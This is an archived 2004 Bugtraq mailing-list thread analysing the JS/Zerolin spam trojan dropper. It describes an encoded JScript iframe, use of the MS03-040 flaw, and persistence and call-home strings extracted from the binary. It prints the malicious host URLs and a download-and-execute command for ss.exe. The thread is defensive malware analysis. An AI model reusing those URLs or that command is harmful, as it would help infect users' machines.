[<prev] [next>] [day] [month] [year] [list]
Message-ID: <653D74053BA6F54A81ED83DCF969DF082D59A8@pivxes1.pivx.com>
Date: Fri, 13 Aug 2004 17:04:58 -0700
From: "Thor Larholm" <tlarholm@...x.com>
To: "T.H. Haymore" <bonk@...chat.chatsystems.com>,
"Nicolas Gregoire" <ngregoire@...probe.com>
Cc: <bugtraq@...urityfocus.com>, <Mark.Amos@...nscorning.com>
Subject: RE: JS/Zerolin
Nicholas was kind enough to provide me with a sample of Zerolin.
Anyone who is even remotely up-to-date with their patches will not be affected by this. At the end of the email is a short piece of encoded Jscript code which when decoded outputs a hidden iframe that retrieves the following URL:
http://202.99.172.153/link.html
Don't click the link, it is still live.
Following a lot of pagebreaks is an attempt to exploit the Object Data vulnerability that was fixed by MS03-040. If successful, this launches MSHTA.EXE which executes the code provided by http://202.99.172.153/link.php which in turn outputs an embedded file to C:\x.exe after which it executes the following command:
C:\x.exe http://202.99.172.153/ss.exe
Here's some of the more interesting strings from that file which suggests Zerolin talks back to index.php on that same IP to notify its owner of a compromised machine:
CoCreateGuid
StringFromCLSID
ole32.dll
wsprintfA
CreateWindowExA
DefWindowProcA
DispatchMessageA
GetMessageA
KillTimer
LoadCursorA
LoadIconA
PostQuitMessage
RegisterClassExA
SendMessageA
SetTimer
SetWindowsHookExA
TranslateMessage
UnhookWindowsHookEx
USER32.dll
CloseHandle
CopyFileA
CreateMutexA
CreateProcessA
CreateThread
DeleteFileA
ExitProcess
FreeLibrary
GetCommandLineA
GetCurrentProcess
GetFileSize
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetSystemDirectoryA
GetTickCount
GetVersionExA
GlobalAlloc
GlobalFree
LoadLibraryA
OpenMutexA
ReleaseMutex
Sleep
TerminateProcess
WaitForSingleObject
WinExec
_lclose
_lcreat
_lopen
_lread
_lwrite
lstrcatA
lstrcmpA
lstrcpyA
lstrlenA
KERNEL32.dll
InitializeAcl
IsValidAcl
RegCloseKey
RegCreateKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
SetSecurityInfo
ADVAPI32.dll
WS2_32.dll
%lu
Timer UP
Timer Down
&Name=
http://
/index.php?Client=
close
SSClass
SSIcon
kernel32.dll
RegisterServiceProcess
\dss.dll
\dssa.dll
dssa.dll
\ss.dat
\ss.dop
202.99.
CLSID\
\InProcServer32
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
172.153
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
Default
AutoProc
ss.exe
\ss.exe
one
CallNextHookEx
USER32.dll
GetSystemDirectoryA
WinExec
lstrcatA
KERNEL32.dll
dss.dll
AutoProc
\ss.exe
FindWindowA
SendMessageA
USER32.dll
DeleteFileA
GetFileSize
GetSystemDirectoryA
GlobalAlloc
GlobalFree
WinExec
_lclose
_lcreat
_lopen
_lread
_lwrite
lstrcatA
lstrcpyA
KERNEL32.dll
dssa.dll
AutoProc
\ss.exe
\ss.dat
\ss.dop
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor@...x.com
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9
PivX defines a new genre in Desktop Security: Proactive Threat Mitigation.
<http://www.pivx.com/qwikfix>
-----Original Message-----
From: T.H. Haymore [mailto:bonk@...chat.chatsystems.com]
Sent: Friday, August 13, 2004 7:51 AM
To: Nicolas Gregoire
Cc: bugtraq@...urityfocus.com; Mark.Amos@...nscorning.com
Subject: Re: JS/Zerolin
On Fri, 13 Aug 2004, Nicolas Gregoire wrote:
Nicholas,
Thanks for the insight. I've received several replies telling me to look at McAfee (yadda-yadda) and other sites. I am well aware of the Zerolin VBS script as I researched it before posting. You've provided what insight I was looking for on the java script side.
Mark, I think this is what we're looking for. Also, keep us updated as to what else you see as this could very well be a new version and they are indeed 'testing'.
Thanks again,
-th
<snip>
> Hi,
>
> I've seen theses emails since last Friday, and my gateway has since
> received around 200 of them. KAV and ClamAV detect them as
> "TrojanDropper.VBS.Zerolin"
>
> It appears that a small Jscript.Encoded code is hidden at the botton
> of a false (true ?) spam. After several redirections, un ss.exe file
> is downloaded. This file is detected as following :
>
> KAV : Trojan.Win32.Genme.c
> Trend : not detected
> ClamAV : Trojan.Xebiz.A
> F-Prot : W32/Xebiz.A
> NAI : not detected
>
> Regards,
> --
> Nicolas Gregoire ----- Consultant en Sécurité des Systèmes
> d'Information
=================================================
Travis
www.cyberabuse.org/crimewatch
Email: Bonk@...tsystems.com | Bonk@...erabuse.org =================================================
/"\
\ /
X ASCII Ribbon Campaign
/ \ Against HTML Email
Powered by blists - more mailing lists